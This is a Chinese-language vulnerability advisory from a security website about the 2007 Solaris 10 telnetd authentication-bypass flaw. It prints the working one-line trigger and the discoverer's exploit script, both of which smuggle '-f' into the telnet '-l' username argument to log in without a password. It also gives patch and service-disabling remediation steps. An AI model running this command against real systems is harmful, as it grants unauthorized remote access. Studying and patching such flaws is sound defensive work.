首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Solaris 10 telnet漏洞及解决
来源:www.vfocus.net 作者:vfocus 发布时间:2007-04-19  
漏洞最早发现者 Kingcope
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf
(另: 上次 SunOS login TTYPROMPT环境变量绕过验证漏洞发生在 2002年10月
    http://marc.theaimsgroup.com/?l=bugtraq&m=103357889303304&w=2
    http://marc.info/?l=bugtraq&m=103357889303304&w=2
)

受影响的版本:
Solaris 10及以后版本

触发方法:
-l 后面跟 -fusername
telnet -l"-fbin" 192.168.1.1

发现者提供的脚本如下:
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
        echo "./sunos <host> <account>"
        echo "./sunos localhost bin"
        exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1

解决:
1. 打补丁
说明:Solaris 10的补丁,除了Security和hardware相关补丁可以免费下载,其它都是要服务支持的,
就是Sun Service Plan。但是对于知道Patch号的,可以从http://sunsolve.sun.com中单个下载。
这里可以在sunsolve上用PatchFinder查找120068-03补丁并下载,安装到系统中。

    # showrev -p | grep 120068
    Patch: 120068-01 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWtnetd
    Patch: 120068-03 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWtnetd

2. 可以禁止telnet方式登录
    # svccfg list | grep telnet
    network/telnet
    # svcs -l network/telnet
    fmri         svc:/network/telnet:default
    name         Telnet server
    enabled      true
    state        online
    next_state   none
    state_time   Mon Feb 26 03:50:13 2007
    restarter    svc:/network/inetd:default
    禁止telnet服务
    # svcadm disable svc:/network/telnet:default

SUN技术支持工程师Alan Hargreaves的相关blog:
http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·动网(DVBBS)Version 8.2.0 后
·破解无线路由器密码,常见无线密
·南方数据企业网站管理系统V10.0
·Nginx %00空字节执行php漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
·dedecms最新版本修改任意管理员
·WinWebMail、7I24提权漏洞
  相关文章
·IBM WebSphere应用服务器源码泄
·Discuz! 5.5 0324 跨站漏洞
·Tomcat URI Stack Overflow
·Advanced Heap Spray Technique
·firefox惊爆0day高危漏洞:Cross
·Tencent QQ QQzone WebCtrl Acti
·百度超级搜霸远程代码执行漏洞
·数千万聊天用户遇到挂马危险--Bl
·支付宝所有版本均存严重漏洞 黑
·思科IOS 近日曝出VLAN中继协议安
·利用Yahoo! Messenger 8.1.0 Act
·0day-java加载任意目录库文件(ja
  推荐广告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved